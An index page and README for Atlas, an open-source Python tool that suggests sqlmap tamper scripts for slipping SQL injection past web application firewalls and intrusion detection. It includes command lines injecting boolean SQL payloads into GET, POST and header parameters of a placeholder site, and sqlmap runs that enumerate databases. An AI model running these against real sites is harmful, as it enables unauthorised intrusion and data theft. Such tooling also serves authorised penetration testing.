Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/m4ll0k/Atlas

Quick SQLMap Tamper Suggester
https://github.com/m4ll0k/Atlas

hacking injection sql sqlmap tool

Last synced: about 1 month ago
JSON representation

Quick SQLMap Tamper Suggester

Host: GitHub
URL: https://github.com/m4ll0k/Atlas
Owner: m4ll0k
License: gpl-3.0
Created: 2018-10-06T19:31:23.000Z (almost 6 years ago)
Default Branch: master
Last Pushed: 2022-07-18T19:26:05.000Z (about 2 years ago)
Last Synced: 2024-06-26T00:36:55.523Z (3 months ago)
Topics: hacking, injection, sql, sqlmap, tool
Language: Python
Size: 57.6 KB
Stars: 1,306
Watchers: 42
Forks: 261
Open Issues: 17
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

WebHackersWeapons - Atlas
awesome-hacking-lists - m4ll0k/Atlas - Quick SQLMap Tamper Suggester (Python)
StarryDivineSky - m4ll0k/Atlas

README

Atlas - Quick SQLMap Tamper Suggester v1.0
---

__Atlas__ is an open source tool that can suggest sqlmap tampers to bypass WAF/IDS/IPS, the tool is based on returned status code.

![atlas_main](https://i.imgur.com/G2bXF3A.png)

Screen
---
![atlas_run](https://i.imgur.com/I6cXSKd.png)

Installation
---
```
$ git clone https://github.com/m4ll0k/Atlas.git atlas
$ cd atlas
$ python atlas.py # python3+
```

Usage
---
```
$ python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
```

injection point (with `%%inject%%`):

get:
```
$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
```

post:
```
$ python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
```

headers:
```
$ python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
```

tampers concatenation:

```
$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v
```

get tampers list:

```
$ python atlas.py -g
```

Example
---
1. Run SQLMap:
```
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3
```
![sqlmap](https://i.imgur.com/XP39Rqz.png)

```Price_ASC') AND 8716=4837 AND ('yajr'='yajr``` is blocked by WAF/IDS/IPS, now trying with Atlas:
```
$ python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v
```
![atlas_succ](https://i.imgur.com/U6qEnXp.png)

At this point:

```
$ python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,...
```

#### The new Update get will soon stay updated
$ BurpSuite